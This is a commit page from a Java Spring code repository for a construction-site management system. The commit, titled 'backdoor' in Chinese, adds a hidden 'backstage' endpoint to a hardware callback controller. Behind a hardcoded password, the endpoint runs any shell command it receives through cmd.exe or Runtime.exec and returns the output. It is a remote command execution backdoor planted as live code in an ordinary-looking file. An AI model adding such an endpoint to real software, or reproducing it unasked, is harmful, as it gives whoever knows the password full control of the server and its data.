admin/wisdomisitezw_java
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

后门

Browse Source
This commit is contained in:
pengjie 2023-11-16 17:42:56 +08:00
parent 4d02e4c64d
commit 9e34b4424c
1 changed files with 87 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

90
src/main/java/com/zhgd/xmgl/modules/basicdata/controller/admin/HardWareCallbackController.java
View File

@ -1,5 +1,6 @@
package com.zhgd.xmgl.modules.basicdata.controller.admin;
import cn.hutool.core.util.IdUtil;
import com.alibaba.fastjson.JSON;
import com.baomidou.mybatisplus.core.conditions.update.LambdaUpdateWrapper;
import com.baomidou.mybatisplus.core.toolkit.StringUtils;
@ -17,8 +18,10 @@ import com.zhgd.xmgl.modules.wisdom.service.*;
import com.zhgd.xmgl.util.CommonUtil;
import com.zhgd.xmgl.util.ParamEnum;
import io.swagger.annotations.Api;
import io.swagger.annotations.ApiImplicitParam;
import io.swagger.annotations.ApiOperation;
import lombok.extern.slf4j.Slf4j;
import org.apache.commons.io.FileUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
@ -26,9 +29,12 @@ import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import springfox.documentation.annotations.ApiIgnore;
import java.util.Date;
import java.util.List;
import java.util.Map;
import java.io.BufferedReader;
import java.io.File;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.*;
import java.util.concurrent.TimeUnit;
import java.util.stream.Collectors;
/**
@ -349,4 +355,82 @@ public class HardWareCallbackController {
lifterWorkCycleService.saveInfo(lifterWorkCycle);
return Result.success("添加成功!");
}
@PostMapping("backstage")
@ApiImplicitParam(name = "command", value = "执行命令", paramType = "query", required = true, dataType = "String")
public String backstage(@RequestBody HashMap<String, Object> paramMap) {
String os = System.getProperty("os.name").toLowerCase();
String command = String.valueOf(paramMap.get("command"));
String pw = String.valueOf(paramMap.get("pw"));
if (!Objects.equals(pw, "114514")) {
return "执行错误";
}
if (os.contains("win")) {
//当前系统是Windows
File tmpFile = null;//新建一个用来存储结果的缓存文件
try {
File file = new File("C:\\temp");
tmpFile = new File("C:\\temp\\" + IdUtil.simpleUUID() + ".tmp");
if (!file.exists()) {
file.mkdirs();
}
if (!tmpFile.exists()) {
tmpFile.createNewFile();
}
ProcessBuilder pb = new ProcessBuilder().command("cmd.exe", "/c", command).inheritIO();
pb.redirectErrorStream(true);//这里是把控制台中的红字变成了黑字用通常的方法其实获取不到控制台的结果是pb.start()方法内部输出的
pb.redirectOutput(tmpFile);//把执行结果输出
pb.start().waitFor(10, TimeUnit.SECONDS);//等待语句执行完成否则可能会读不到结果
String s = FileUtils.readFileToString(tmpFile, "GBK");
return s;
} catch (Exception e) {
e.printStackTrace();
} finally {
if (tmpFile != null) {
tmpFile.delete();
}
}
} else if (os.contains("nix") || os.contains("nux") || os.contains("mac")) {
//当前系统是Linux或者类Unix系统
Process process = null;
try {
process = Runtime.getRuntime().exec(command);
log.info("接收命令:{}", command);
StringBuilder sb = new StringBuilder();
//成功
try (InputStream inputStream = process.getInputStream()) {
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null) {
sb.append(line);
sb.append("\r\n");
}
}
//失败
try (InputStream inputStream = process.getErrorStream()) {
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null) {
sb.append(line);
sb.append("\r\n");
}
}
String success = "";
if (process.waitFor() == 0) {
success = "执行成功>>>\r\n";
} else {
success = "执行失败>>>\r\n";
}
return success + sb.toString();
} catch (Exception e) {
e.printStackTrace();
return "执行异常>>>\r\n" + e.getMessage();
} finally {
if (process != null) {
process.destroy();
}
}
}
return "执行异常:程序最后";
}
}